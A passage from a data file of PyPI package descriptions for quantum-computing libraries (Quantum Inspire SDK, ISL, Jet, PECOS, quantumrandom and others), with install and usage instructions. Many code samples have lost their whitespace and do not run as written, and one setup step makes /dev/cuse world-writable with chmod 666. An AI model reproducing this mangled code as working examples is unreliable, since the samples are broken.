viewedhere.RunningFor example usage see the python scripts and Jupyter notebooks in thedocs/examplesdirectory\nwhen installed from source or the share/doc/quantuminspire/examples/ directory in the\nlibrary root (Python\u2019s sys.prefix for system installations; site.USER_BASE for user\ninstallations) when installed from PyPI.For example, to run the ProjectQ example notebook after installing from source:cd docs/examples\njupyter notebook example_projectq.ipynbOr to perform Grover's with the ProjectQ backend from a Python script:cd docs/examples\npython example_projectq_grover.pyAnother way to browse and run the available notebooks is by clicking the 'launch binder' button above.It is also possible to use the API through the QuantumInspireAPI object\ndirectly. This is for advanced users that really know what they are\ndoing. The intention of the QuantumInspireAPI class is that it is used\nas a thin layer between existing SDK's such as ProjectQ and Qiskit,\nand is not primarily meant for general use. You may want to explore this\nif you intend to write a new backend for an existing SDK.A simple example to perform entanglement between two qubits by using the\nAPI wrapper directly:fromgetpassimportgetpassfromcoreapi.authimportBasicAuthenticationfromquantuminspire.apiimportQuantumInspireAPIprint('Enter mail address')email=input()print('Enter password')password=getpass()server_url=r'https://api.quantum-inspire.com'authentication=BasicAuthentication(email,password)qi=QuantumInspireAPI(server_url,authentication,'my-project-name')qasm='''version 1.0qubits 2H q[0]CNOT q[0], q[1]Measure q[0,1]'''backend_type=qi.get_backend_type_by_name('QX single-node simulator')result=qi.execute_qasm(qasm,backend_type=backend_type,number_of_shots=1024)ifresult.get('histogram',{}):print(result['histogram'])else:reason=result.get('raw_text','No reason in result structure.')print(f'Result structure does not contain proper histogram data.{reason}')Configure a project name for Quantum InspireAs a default, SDK stores the jobs in a Quantum Inspire project with the name \"qi-sdk-project-\" concatenated with a\nunique identifier for each run. Providing a project name yourself makes it easier to find the project in the Quantum\nInspire web-interface and makes it possible to gather related jobs to the same project.Qiskit users do something like:fromcoreapi.authimportBasicAuthenticationfromquantuminspire.qiskitimportQIauthentication=BasicAuthentication(\"email\",\"password\")QI.set_authentication(authentication,project_name='my-project-name')or set the project name separately after setting authenticationfromcoreapi.authimportBasicAuthenticationfromquantuminspire.qiskitimportQIauthentication=BasicAuthentication(\"email\",\"password\")QI.set_authentication(authentication)QI.set_project_name('my-project-name')ProjectQ users set the project name while initializing QuantumInspireAPI:fromcoreapi.authimportBasicAuthenticationfromquantuminspire.apiimportQuantumInspireAPIauthentication=BasicAuthentication(\"email\",\"password\")qi_api=QuantumInspireAPI(authentication=authentication,project_name='my-project-name')Configure your token credentials for Quantum InspireCreate a Quantum Inspire account if you do not already have one.Get an API token from the Quantum Inspire website.With your API token run:fromquantuminspire.credentialsimportsave_accountsave_account('YOUR_API_TOKEN')After calling save_account(), your credentials will be stored on disk.\nThose who do not want to save their credentials to disk should use instead:fromquantuminspire.credentialsimportenable_accountenable_account('YOUR_API_TOKEN')and the token will only be active for the session.After calling save_account() once or enable_account() within your session, token authentication is done automatically\nwhen creating the Quantum Inspire API object.For Qiskit users this means:fromquantuminspire.qiskitimportQIQI.set_authentication()ProjectQ users do something like:fromquantuminspire.apiimportQuantumInspireAPIqi=QuantumInspireAPI()To create a token authentication object yourself using the stored token you do:fromquantuminspire.credentialsimportget_authenticationauthentication=get_authentication()Thisauthenticationcan then be used to initialize the Quantum Inspire API object.TestingRun all unit tests and collect the code coverage using:coverage run --source=\"./src/quantuminspire\" -m unittest discover -s src/tests -t src -v\ncoverage report -mKnown issuesKnown issues and common questions regarding the Quantum Inspire platform\ncan be found in theFAQ.Bug reportsPlease submit bug-reportson the github issue tracker."} +{"package": "quantum-ios", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-isl", "pacakge-description": "Incremental Structure Learning (ISL)An open-source implementation of ISL [1], a circuit recompilation algorithm that finds an approximate representation of\nany circuit acting on the |0>|0>...|0> state. Created for the IBM Quantum Awards: Open Sciece Prize 2021. More details of ISL and its use in the Quantum Awards can be found by downloading the submissionhere.[1] B Jaderberg, A Agarwal, K Leonhardt, M Kiffner, D Jaksch, 2020 Quantum Sci. Technol. 5 034015Installing ISLThe best way of installing ISL is throughpip:pip install quantum-islUsing ISLMinimal exampleA circuit can be recompiled and the result accessed with only 3 lines if using the\ndefault settings.fromisl.recompilersimportISLRecompilerfromqiskitimportQuantumCircuit# Setup the circuitqc=QuantumCircuit(3)qc.rx(1.23,0)qc.cx(0,1)qc.ry(2.5,1)qc.rx(-1.6,2)qc.ccx(2,1,0)# Recompilerecompiler=ISLRecompiler(qc)result=recompiler.recompile()recompiled_circuit=result['circuit']# See the recompiled outputprint(recompiled_circuit)Specifying additional configurationThe default settings can be changed by specifying arguments when\nbuildingISLRecompiler(). Many of the configuration options are bundled into theISLConfigclass.fromisl.recompilersimportISLRecompiler,ISLConfigfromqiskit.circuit.randomimportrandom_circuitqc=random_circuit(5,5,seed=2)# Recompileconfig=ISLConfig(sufficient_cost=1e-3,max_2q_gates=25)recompiler=ISLRecompiler(qc,entanglement_measure='EM_TOMOGRAPHY_CONCURRENCE',isl_config=config)result=recompiler.recompile()recompiled_circuit=result['circuit']# See the original circuitprint(qc)# See the recompiled solutionprint(recompiled_circuit)Here we have specified a number of thingssufficient_cost=1e-3: The state produced by the recompiled solution will have an overlap of at least 99.9% with respect to the state produced by the original circuit.max_2q_gates=25: If our solution contains more than 25 CNOT gates, return early. Setting this to the number of 2-qubit gates in the original circuit provides a useful upper limit.entanglement_measure: This argument on the recompiler itself specifies the type of entanglement measure used when deciding which qubits to add the next layer to.More configuration options can be explored in the documentation ofISLConfigandISLRecompiler.Comparing quantum resourcesTaking the above example, lets compare the number of gates and circuit depth before and after recompilation.fromqiskitimporttranspile# Transpile the original circuits to the common basis setqc_in_basis_gates=transpile(qc,basis_gates=['u1','u2','u3','cx'],optimization_level=3)print(qc_in_basis_gates.count_ops())print(qc_in_basis_gates.depth())# Compare with recompiled circuitprint(recompiled_circuit.count_ops())print(recompiled_circuit.depth())In the above example, the original circuit contains 25 CNOT gates and\n32 single-qubit gates with a depth of 33. By comparison, the recompiled solution\nprepares the same state to 99.9% overlap with on average 6 CNOT gates and\n8 two-qubit gates with a depth of 9 (average tested over 10 runs).TroubleshootingNote: ISL depends onqiskit-ignis, which was deprecated in Qiskit 0.37.0. Until migration to Qiskit Experiments is completed, you may see the following error:ModuleNotFoundError: No module named 'qiskit.ignis'To fix this, simply downagrade your version of Qiskit to < 0.37.0.Citing usageWe respectfully ask any publication, project or whitepaper using ISL to cite the original literature:B Jaderberg, A Agarwal, K Leonhardt, M Kiffner, D Jaksch, 2020 Quantum Sci. Technol. 5 034015.https://doi.org/10.1088/2058-9565/ab972b"} +{"package": "quantum-jet", "pacakge-description": "Jetis a cross-platform C++ and Python\nlibrary for simulating quantum circuits using tensor network contractions.FeaturesRuns on a variety of systems, from single-board machines to massively parallel\nsupercomputers.Accelerates tensor contractions using a novel task-based parallelism approach.Models quantum systems with an arbitrary number of basis states.To get started with Jet, read one of ourtutorial walkthroughsor\nbrowse the fullAPI documentation.InstallationC++The Jet C++ library requiresTaskflow,\na BLAS library with a CBLAS interface, and a C++ compiler with C++17 support.\nTo use Jet, add#include to the top of your header file and link\nyour program with the CBLAS library.For example, assuming that the Taskflow headers can be found in yourg++include path and OpenBLAS is installed on your system, you can compile thehellojet.cppprogram below#include#include#include#includeintmain(){usingTensor=Jet::Tensor>;Tensorlhs({\"i\",\"j\",\"k\"},{2,2,2});Tensorrhs({\"j\",\"k\",\"l\"},{2,2,2});lhs.FillRandom();rhs.FillRandom();Tensorres=Tensor::ContractTensors(lhs,rhs);for(constauto&datum:res.GetData()){std::cout<>>importquantumnetworksasqnBuilding from sourceTo buildquantumnetworksfrom source, pip install using:git clone git@github.com:Phionx/quantumnetworks.git\ncd quantumnetworks\npip install --upgrade .If you also want to download the dependencies needed to run optional tutorials, please usepip install --upgrade .[dev]orpip install --upgrade '.[dev]'(forzshusers).Installation for DevsIf you intend to contribute to this project, please installquantumnetworksin develop mode as follows:gitclonegit@github.com:Phionx/quantumnetworks.gitcdquantumnetworks\npipinstall-e.[dev]Please usepip install -e '.[dev]'if you are azshuser.MotivationWe presentquantumnetworksas a numerical simulation tool with which to explore the time-dynamics of a driven, lossness, and nonlinear multi-mode quantum network using the Heisenberg-Langevin Equations. The applications of this tooling span quantum transduction, bosonic quantum error correction systems, quantum communication, and more.CodebaseThe codebase is split acrossquantumnetworks/systemsandquantumnetworks/analysis, which respectively provide solvers and analysis tools for several quantum network systems of interest.Future DirectionsCheckoutissuesto see what we are working on these days!AcknowledgementsCore Devs:Shantanu Jha,Shoumik Chowdhury,Lamia AteshianThanks toProfessor Luca Danieland our TA, Taqiyyah Safi, for invaluable feedback during the development of this package in the Fall 2021 iteration ofIntroduction to Numerical Simulation(6.336) at MIT."} +{"package": "quantum-pecos", "pacakge-description": "PECOS (Performance Estimator of Codes On Surfaces) is a Python framework for studying, developing, and evaluating\nquantum error-correction protocols.Author: Ciar\u00c3\u00a1n Ryan-AndersonLanguage: Python 3.5.2+ (with optional C and C++ extensions)ContactFor questions or suggestions, please feel free to contact the author:Ciar\u00c3\u00a1n Ryan-Anderson,ciaran.ryan-anderson@quantinuum.comGetting StartedTo get started, check out the documentation in the \"docs\" folder or find it online at:https://quantum-pecos.readthedocs.ioLatest DevelopmentSee the following branch for the latest version of PECOS under development:https://github.com/PECOS-packages/PECOS/tree/developmentBEAWARE: There are some changes planned in 0.2.dev that may break some backwards compatibility with 0.1. Although, we try to minimize breaks to backwards compatibility.RequirementsPython 3.5.2+NumPy 1.15+SciPy 1.1+Matplotlib 2.2+NetworkX 2.1+Optional DependenciesCython (to compile optional C/C++ extensions)pytest 3.0+ (to run tests)Sphinx 2.7.6+ (to compile documentation)LicensePECOS is licensed under theApache 2.0 licenseInstallationTo install using pip run the command:pip install quantum-pecosTo install from GitHub go to:https://github.com/PECOS-packages/PECOSThen, download/unzip or clone the version of PECOS you would like to use. Next, navigate to the root of the package\n(where setup.py is located) and run:pip install .To install and continue to develop the version of PECOS located in the install folder, run the\nfollowing instead:pip install -e .UninstallTo uninstall run:pip uninstall quantum-pecos"} +{"package": "quantumpy", "pacakge-description": "Quantumpy======An ultra simple wrapper for the Socialmetrix Quantum API, with basic functionalityUsage-----::from quantumpy import QuantumAPI# Initialize connection with the api, providing account_id and your JWT tokenc = QuantumAPI(account_id, jwt_token)# Get all projects associated with accountprojects = c.get_projects()Installation------------::$ pip install quantumpy"} +{"package": "quantum-QBD", "pacakge-description": "Quantum side."} +{"package": "quantum-qt", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-qubit-mapping", "pacakge-description": "Qubit Mapping for NISQ-Era Quantum DevicesIntroductionThe goal of this project was to implement the paperTackling the Qubit Mapping Problem for NISQ-Era Quantum DevicesbyGushu Li, Yufei Ding, and Yuan Xie.PurposeDue to limited connections between physical qubits, most two-qubit gates cannot be directly implemented on Noisy Intermediate-Scale Quantum (NISQ) devices. A dynamic remapping of logical to physical qubits is needed to enable execution of two qubit gates in a quantum algorithm on a NISQ device. This project implements aSWAP-based BidiREctional heuristic search algorithm (SABRE), proposed in the given paper that is applicable to NISQ devices with arbitrary qubit connectionsProblem StatementGiven an input quantum circuit and the coupling graph of a quantum device, find aninitial mappingand the intermediate qubitmapping transition(by inserting SWAPs) to satisfy all two-qubit constraints and try to minimize the number of additional gates and circuit depth in the final hardware-compliant circuit.ReferencesTackling the Qubit Mapping Problem for NISQ-Era Quantum DevicesbyGushu Li, Yufei Ding, and Yuan Xie.Click here for pdfPyquil docsUsageAn example of how to use this package is illustrated inexample.py.Construct a pyquil program:from pyquil import Program\nfrom pyquil.gates import CNOT, Gate, H, SWAP\noriginal_circuit = Program()\noriginal_circuit.inst(CNOT(0, 1))\noriginal_circuit.inst(CNOT(2, 3))\noriginal_circuit.inst(CNOT(1, 3))\noriginal_circuit.inst(CNOT(1, 2))\noriginal_circuit.inst(CNOT(2, 3))\noriginal_circuit.inst(CNOT(0, 3))Define a coupling graph (the coupling graph can also be a predefined one based on the underlying chip architecture):import networkx as nx\ncoupling_graph = nx.Graph()\ncoupling_graph.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3)])Apply preprocessing on the circuit and the coupling graph to generate a random initial mapping and a distance matrix:from sabre_tools.circuit_preprocess import preprocess_input_circuit, get_initial_mapping, get_distance_matrix\ninitial_mapping = get_initial_mapping(circuit=original_circuit, coupling_graph=coupling_graph)\ndistance_matrix = get_distance_matrix(coupling_graph=coupling_graph)Execute the SABRE algorithm on the circuit in forward-backward-forward passes where final mapping output of each pass is provided as the initial mapping of the reverse circuit in the next passfrom sabre_tools.sabre import SABRE\nfor iteration in range(3):\nfront_layer_gates, circuit_dag = preprocess_input_circuit(circuit=temp_circuit)\nfinal_program, final_mapping = sabre_proc.execute_sabre_algorithm(front_layer_gates = front_layer_gates, qubit_mapping = temp_mapping, circuit_dag = circuit_dag)\n\nreversed_ins = reversed(temp_circuit.instructions)\ntemp_circuit = Program()\nfor ins in reversed_ins:\n temp_circuit.inst(ins)\ntemp_mapping = final_mapping.copy()To check if SABRE algorithm was able to insert SWAPs in the circuit so that all 2-qubit gates were executed successfully, call therewiring_correctness()function:forbidden_gates = sabre_proc.rewiring_correctness(final_program, final_mapping)\nif forbidden_gates:\n print(\"\", forbidden_gates)\nelse:\n print(\"All gates have been executed\")This function scans the logical to physical qubit mapping and the SWAP inserted circuit to determine if there are gates are not executable and returns the non-executable gate if true, otherwise returns an empty dictionary. This function can also be used to check if the original circuit requires the use of SABRE in the first placeCount the number of 2 qubit gates in the original or final circuit to determine the circuit depth and number of gates:two_qubit_gate_count = sabre_proc.cnot_count(program)Future ScopeThis project has been developed using Rigetti's quantum programming framework Pyquil. A future scope of this project is to make it platform independent so that SABRE can be applied to a quantum program written in any framework.\nAnother possible scope of research is to implement other algorithms in this field and perform a comparison based on number of gates reduction, scalability, runtime speedup, algorithm performance on large circuits etc.QC Mentorship ProgramThis project has been initiated and completed as part of theQC Mentorship ProgramunderQuantum Open Source Foundation (QOSF)in collaboration withUnitary Fund.This work has been completed with constant guidance and motivation by my mentor Petar Korponai\u00c4\u2021\n(LinkedIn)."} +{"package": "quantum-queen", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-query-optimizer", "pacakge-description": "QuantumQueryOptimizerA toolkit to find the optimal quantum query complexity and query optimal quantum algorithm of arbitrary Boolean functions.We present this toolkit in our paper titled\n\"Robust and Space-Efficient Dual Adversary Quantum Query Algorithms\".\nThe code, data, and figures for the experiments in the paper can\nbe found in thepaper/folder.Consider a function f that maps from D to E where D is a subset of bitstrings\nof length n and E is the corresponding set of single bit outputs.\nIn the query model, an algorithm looks at the bits of the input string x in D\nas few times as possible before correctly determing f(x).\nGiven f, our program finds the optimal query complexity of a quantum algorithm\nthat evaluates f and a span program (i.e. quantum algorithm) that meets\nthis query complexity by solving a semidefinite program (SDP).There are two ways to run our program.\nFirst, explicitly specify the sets D and E.\nSecond, create one function that generates the set D for arbitrary bitstring length n\nand another function that generates the set E from D according to f.\n(Note: We provide example functions inboolean_functions.py.)InstallationInstall via pip withpip install quantum-query-optimizer.Example 1 - Explicit ConstructionWe consider the Boolean functionORon input bitstrings of length 2.\nThe output is'1'if any bit is 1 and'0'otherwise.\nIn this example, we explicitly define bothDandE.\nThen we call our functionqqo.runSDPafter loading the\nour packagequantum_query_optimizerasqqo.importquantum_query_optimizerasqqoD=['00','01','10','11']E=['0','1','1','1']qqo.runSDP(D=D,E=E)The corresponding output should look similar to:n: 2\nD: ['00', '01', '10', '11']\nE: ['0', '1', '1', '1']\nOptimal Query Complexity: 1.414\nNumber of Iterations: 73\nRun Time: 0.067 secondsExample 2 - Function ConstructionWe again considerORon bitstrings of length 2.\nIn this example, though, we define functions to generate\nall bitstrings of length n and evaluate the functionORon D.\nThen we pass our functions intoqqo.runSDPForNand specify\nfor which sizes of bitstringnwe want to solve the SDP.importquantum_query_optimizerasqqoqqo.runSDPForN(getD=qqo.getDAll,getE=qqo.getEOR,n_end=2,n_start=2))The corresponding output should look similar to:n: 2\nD: ['00', '01', '10', '11']\nE: ['0', '1', '1', '1']\nOptimal Query Complexity: 1.414\nNumber of Iterations: 73\nRun Time: 0.058 seconds(You can find more examples indemo.ipynb.)Semidefinite Program FormulationWe use Ben Reichardt's formulation of the SDP for\noptimal quantum query complexity (described inTheorem 6.2)\nand query optimal span program (Lemma 6.5) inSpan programs and quantum query complexity:\nThe general adversary bound is nearly tight for every boolean function.Alternating Direction MethodTo solve the SDP,\nwe use Zaiwen Wen, Donald Goldfarb, and Wotao Yin'sAlgorithm 1described inAlternating direction augmented Lagrangian methods for semidefinite programming."} +{"package": "quantumrand", "pacakge-description": "QuantumRandmaintained fork oflmacken/quantumrandomThis project provides tools for interacting with The ANU Quantum Random Number Generator (qrng.anu.edu.au). It communicates with their JSON API and provides a Python API,aqrandcommand-line tool, and a Linux/dev/qrandcharacter device.(This has to be fixed).QuantumRand was made to work with Python 3. Python 2 support has been dropped as it is now reached End of Life.As of 2.0, QuantumRand has had to adapt to ANU's SSL certificate expiring. QuantumRand is still able to connect via SSL by default, but please be aware that QuantumRand cannot securely validate ANU's SSL authenticity until they update their certificate.Installationpip install quantumrandPython APILow Level API ExamplesThe QuantumRand Python module contains a low-levelget_datafunction, which is modelled after the ANU Quantum Random Number\nGenerator's JSON API. It returns variable-length lists of eitheruint16orhex16data.Validdata_typevalues areuint16andhex16.Thearray_lengthandblock_sizecannot be larger than1024.If for some reason the API call is not successful, or the incorrect amount of data is returned from the server, this function will raise an exception.quantumrand.get_data()[26646]quantumrand.get_data(data_type='uint16', array_length=5)[42796, 32457, 9242, 11316, 21078]quantumrand.get_data(data_type='hex16', array_length=5, block_size=2)['f1d5', '0eb3', '1119', '7cfd', '64ce']High Level API ExamplesBased on the aboveget_datafunction, quantumrand also provides a bunch\nof higher-level helper functions that make easy to perform a variety of\ntasks.Generate a random intgerquantumrand.randfloat(0, 20)18.936751354238194quantumrand.randint(0, 20)5Generate random HEX as a stringquantumrand.hex()[:10]'8272613343'Generate random binary formatted stringquantumrand.binary()[:3]'\\xa5\\x0d\\x1e'The previousbinary()function returns 10000 byteslen(quantumrand.binary())10000Generate uint16 values as a Numpy arrayquantumrand.uint16()numpy.array([24094, 13944, 22109, 22908, 34878, 33797, 47221, 21485, 37930, ...], dtype=numpy.uint16)Randomly select an item from a listquantumrand.list_picker([\"Mary\", \"Bill\", \"Chad\", \"Nicole\"])\"Nicole\"Dice rollingThe two main methods aredice_roll()andquick_dice()Both methods can take 3 optional arguments:nis the number of dice to roll (default is1)dis the number of sides on each die (default is6)minis the lowest number on the die (default is1)dice_roll()returns a tuple where the first value is a list of individual dice rolls, and the second value is the total of the dice rolls.quick_dice()returns an integer with the total dice rolls. This is best for single die rolls and dice rolls you don't need to know the individual rolls of.Roll a single d6 (a standard 6 sided die) and show resultsquantumrand.dice_roll()([3], 3)Roll a single d20 and show resultsquantumrand.dice_roll(d=20)([19], 19)Roll two d9 (0-9) and show resultsquantumrand.dice_roll(d=9, n=2, min=0)([0,3], 3)Roll three d8 and show resultsquantumrand.dice_roll(d=8, n=3)([4,8,3], 15)Roll three d9 (0-9) and show only the total.quantumrand.quick_dice(d=9, n=3, min=0)24You can roll a die with any number of sidesquantumrand.quick_dice(d=67)1Using the Command Line ToolCurrently still being fixed!Getting a random integer within a range:qrand --int --min 5 --max 157Getting random binary values:qrand --binary\ufffd\ufffd\ufffdI\ufffd%\ufffd\ufffde(\ufffd1\ufffd\ufffdc\ufffd\ufffdEe\ufffd4\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdj\ufffd\u053f\ufffd\ufffd=\ufffd^H\ufffdc\ufffdu\noq\ufffd\ufffdG\ufffd\ufffdZ\ufffd^\ufffd\ufffd\ufffdfK\ufffd0_\ufffd\ufffdh\ufffd\ufffds\ufffdb\ufffd\ufffdAE=\ufffdrR~\ufffd\ufffd\ufffd(\ufffd^Q\ufffd)4\ufffd\ufffd{c\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdX{f\ufffd\ufffda\ufffdBk\ufffdN%#W\n+a\ufffda\u0319\ufffdIB\ufffd,S\ufffd!\ua014d\ufffd2H~\ufffdX\ufffdZ\ufffd\ufffd\ufffd\ufffdR\ufffd\ufffd.fGetting random hex values:qrand --hex1dc59fde43b5045120453186d45653dd455bd8e6fc7d8c591f0018fa9261ab2835eb210e8\ne267cf35a54c02ce2a93b3ec448c4c7aa84fdedb61c7b0d87c9e7acf8e9fdadc8d68bcaa5aCreating /dev/qrandThis will have to be updated, as it is not working for any supported version of Python currently."} +{"package": "quantumrandom", "pacakge-description": "This project provides tools for interacting with The ANU Quantum Random\nNumber Generator (qrng.anu.edu.au). It\ncommunicates with their JSON API and provides aqrandomcommand-line\ntool, a Python API, and a Linux/dev/qrandomcharacter device.quantumrandom works on Python 2 and 3.NoteAs of version 1.7, quantumrandom now uses SSL/TLS by default.Installingpip install quantumrandomCommand-line tool$ qrandom --int --min 5 --max 15\n7\n$ qrandom --binary\n\ufffd\ufffd\ufffdI\ufffd%\ufffd\ufffde(\ufffd1\ufffd\ufffdc\ufffd\ufffdEe\ufffd4\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdj\ufffd\u053f\ufffd\ufffd=\ufffd^H\ufffdc\ufffdu\noq\ufffd\ufffdG\ufffd\ufffdZ\ufffd^\ufffd\ufffd\ufffdfK\ufffd0_\ufffd\ufffdh\ufffd\ufffds\ufffdb\ufffd\ufffdAE=\ufffdrR~\ufffd\ufffd\ufffd(\ufffd^Q\ufffd)4\ufffd\ufffd{c\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdX{f\ufffd\ufffda\ufffdBk\ufffdN%#W\n+a\ufffda\u0319\ufffdIB\ufffd,S\ufffd!\ua014d\ufffd2H~\ufffdX\ufffdZ\ufffd\ufffd\ufffd\ufffdR\ufffd\ufffd.f\n...\n$ qrandom --hex\n1dc59fde43b5045120453186d45653dd455bd8e6fc7d8c591f0018fa9261ab2835eb210e8\ne267cf35a54c02ce2a93b3ec448c4c7aa84fdedb61c7b0d87c9e7acf8e9fdadc8d68bcaa5a\n...\n$ qrandom --binary | dd of=data\n^C1752+0 records in\n1752+0 records out\n897024 bytes (897 kB) copied, 77.7588 s, 11.5 kB/sCreating /dev/qrandomquantumrandom comes equipped with a multi-threaded character device in\nuserspace. When read from, this device fires up a bunch of threads to\nfetch data. Not only can you utilize this as a rng, but you can also feed\nthis data back into your system\u2019s entropy pool.In order to build it\u2019s dependencies, you\u2019ll need the following packages\ninstalled: svn gcc-c++ fuse-devel gccxml libattr-devel. On Fedora 17 and\nnewer, you\u2019ll also need the kernel-modules-extra package installed for the\ncuse module.NoteThe /dev/qrandom character device currently only supports Python2pip install ctypeslib hg+https://cusepy.googlecode.com/hg\nsudo modprobe cuse\nsudo chmod 666 /dev/cuse\nqrandom-dev\nsudo chmod 666 /dev/qrandomBy default it will use 3 threads, which can be changed by passing \u2018-t #\u2019 into the qrandom-dev.Testing the randomness forFIPS 140-2compliance$ cat /dev/qrandom | rngtest --blockcount=1000\nrngtest: bits received from input: 20000032\nrngtest: FIPS 140-2 successes: 1000\nrngtest: FIPS 140-2 failures: 0\nrngtest: FIPS 140-2(2001-10-10) Monobit: 0\nrngtest: FIPS 140-2(2001-10-10) Poker: 0\nrngtest: FIPS 140-2(2001-10-10) Runs: 0\nrngtest: FIPS 140-2(2001-10-10) Long run: 0\nrngtest: FIPS 140-2(2001-10-10) Continuous run: 0\nrngtest: input channel speed: (min=17.696; avg=386.711; max=4882812.500)Kibits/s\nrngtest: FIPS tests speed: (min=10.949; avg=94.538; max=161.640)Mibits/s\nrngtest: Program run time: 50708319 microsecondsAdding entropy to the Linux random number generatorsudo rngd --rng-device=/dev/qrandom --random-device=/dev/random --timeout=5 --foregroundMonitoring your available entropy levelswatch -n 1 cat /proc/sys/kernel/random/entropy_availPython APIThe quantumrandom Python module contains a low-levelget_datafunction, which is modelled after the ANU Quantum Random Number\nGenerator\u2019s JSON API. It returns variable-length lists of eitheruint16orhex16data.>>> quantumrandom.get_data()\n[26646]\n>>> quantumrandom.get_data(data_type='uint16', array_length=5)\n[42796, 32457, 9242, 11316, 21078]\n>>> quantumrandom.get_data(data_type='hex16', array_length=5, block_size=2)\n['f1d5', '0eb3', '1119', '7cfd', '64ce']Validdata_typevalues areuint16andhex16, and thearray_lengthandblock_sizecannot be larger than1024. If for some\nreason the API call is not successful, or the incorrect amount of data is\nreturned from the server, this function will raise an exception.Based on thisget_datafunction, quantumrandom also provides a bunch\nof higher-level helper functions that make easy to perform a variety of\ntasks.>>> quantumrandom.randint(0, 20)\n5\n>>> quantumrandom.hex()[:10]\n'8272613343'\n>>> quantumrandom.binary()[0]\n'\\xa5'\n>>> len(quantumrandom.binary())\n10000\n>>> quantumrandom.uint16()\nnumpy.array([24094, 13944, 22109, 22908, 34878, 33797, 47221, 21485, 37930, ...], dtype=numpy.uint16)\n>>> quantumrandom.uint16().data[:10]\n'\\x87\\x7fY.\\xcc\\xab\\xea\\r\\x1c`'"} +{"package": "quantum-random", "pacakge-description": "Quantum random numbers in PythonUse thePython random modulewith real quantum random numbers fromANU. The default pseudo-random generator is replaced by calls to\nthe ANU API.UsageImportqrandomand use it like the standardrandommodule. For example:>>>importqrandom>>>qrandom.random()0.15357449726583722>>>qrandom.sample(range(10),2)[6,4]>>>qrandom.gauss(0.0,1.0)-0.8370871276247828Alternatively, you can use the classqrandom.QuantumRandom. It has the same\ninterface asrandom.Random.There is also aNumPyinterface, although it is not fully tested:>>>fromqrandom.numpyimportquantum_rng>>>qrng=quantum_rng()>>>qrng.random((3,3))# use like numpy.random.default_rng()array([[0.37220278,0.24337193,0.67534826],[0.209068,0.25108681,0.49201691],[0.35894084,0.72219929,0.55388594]])NumPy is supported usingRandomGen.InstallationThe minimum supported Python version is 3.9. Install withpip:pipinstall-Uquantum-randomIf you want NumPy support:pipinstall-U'quantum-random[numpy]'First-time setup: setting your API keyANU requires you to use an API key. You can get a free trial or pay for a keyhere.You can pass your key toqrandomin three ways:By setting the environment variableQRANDOM_API_KEY.By running the included command line utilityqrandom-initto save your\nkey inqrandom.iniin a subdirectory of your home config directory\nas specified by XDG, e.g.,/home//.config/qrandom/.By runningqrandom-initto save your key inqrandom.iniin a directory\nof your choice, and then specifying this directory by settingQRANDOM_CONFIG_DIR.IfQRANDOM_API_KEYis set, its value is used as the API key and the\nconfig file is not read. Otherwise,qrandomwill look for the key\nin the config directory. The config directory defaults to the XDG home config\nand can be changed by settingQRANDOM_CONFIG_DIR.Pre-fetching batchesBatches of quantum numbers are fetched from the API as needed.\nEach batch contains 1024 numbers. Useqrandom.fill(n)to fetchnbatches\nif you need to pre-fetch at the start of your computation.TestsThe tests run for Python 3.9 - 3.12 on the latest Windows,\nmacOS and Ubuntu runner images. Usetoxto run the tests locally.Seeherefor a visualisation and a Kolmogorov\u2013Smirnov\ntest.Notes on implementationTheqrandommodule exposes a class derived fromrandom.Randomwith arandom()method that outputs quantum floats in the range [0, 1)\n(converted from 64-bit integers). Overridingrandom.Random.randomis sufficient to make theqrandommodule behave mostly like therandommodule as described in thePython docs. The exceptions\naregetrandbits()andrandbytes(): these are not available inqrandom. Becausegetrandbits()is not available,randrange()cannot\nproduce arbitrarily long sequences. Finally, the user is warned whenseed()is called because the quantum generator has no state. For the same reason,getstate()andsetstate()are not implemented.LicenseSeeLICENCE."} +{"package": "quantumreservoirpy", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-robot", "pacakge-description": "quantum-robotis a Python package for quantum-like perception modeling\nfor robotics. The package exploitsQiksitframework, implementing the models on quantum circuits which can be\nsimulated on a classical computer or sent to a quantum backend (service\nprovided byIBM Quantum\nExperience).The project was started in 2019 by Davide Lanza as a Master thesis\nresearch, with the help ofFulvio\nMastrogiovanniandPaolo\nSolinas.It is currently maintained by Davide Lanza.Website:http://quantum-robot.orgRepository:https://github.com/Davidelanz/quantum-robot/Documentation:http://quantum-robot.org/docsContentsInstallNotebooksContributingCitingLicenseInstallDependenciesSee the required packageshere.User installationThe easiest way to installquantum-robotis usingpip:pip install -U quantum-robotThe package can beinstalled from\nsourceas well. You can check the latest sources with the command:git clone https://github.com/Davidelanz/quantum-robot.gitTestingAfter installation, you can launch the test suite from outside the\nsource directory (you will need to havepytestinstalled):pytest qrobotSee also theGetting\nStartedguide.ContributingIf you are interested in the project, we welcome new contributors of all\nexperience levels. For any question,contact the\nmaintainer.An example module with the docstring standard we adopted is availablehere.LicenseGNU-GPLv3"} +{"package": "quantumsculpt", "pacakge-description": "QuantumSculptQuantumSculpt is a bundle of Python scripts to analyze the electronic\nstructure of systems calculated usingVASP. QuantumSculpt\nis designed to operate onVASP WAVECARfiles\nand on the output files ofLobster, specifically DOS and COHP\ntype of files.InstallationAnacondacondainstall-cifilotquantumsculptPyPipipinstallquantumsculptManualSee:https://quantumsculpt-inorganic-materials-chemistry-5002ad1bf06a7fa61a5.pages.tue.nl/"} +{"package": "quantumsecurity", "pacakge-description": "QuantumSecurityA Python package for supporting security applications with the power of quantum computing and cryptography.DescriptionQuantumSecurity is a Python package designed to assist developers in implementing security applications using quantum computing and cryptography. The package currently provides a function namedqrandthat generates quantum random numbers. The generated quantum random numbers are in hexadecimal format.InstallationYou can install QuantumSecurity using pip:pipinstallquantumsecurity## Usagefromquantumsecurityimportqrand# Generate a quantum random number with 16 bitsrandom_number=qrand(16)print(\"Quantum Random Number:\",random_number)## DependenciesThecurrentversionofQuantumSecurityreliesontheQiskitpackageandits'qasm_simulator'forquantumrandomnumbergeneration.Infutureiterations,supportforothersimulatorsfromAmazonBraketandQuantumHardwarefacilitieswillbeaddedtothe'qrand'function.## Future 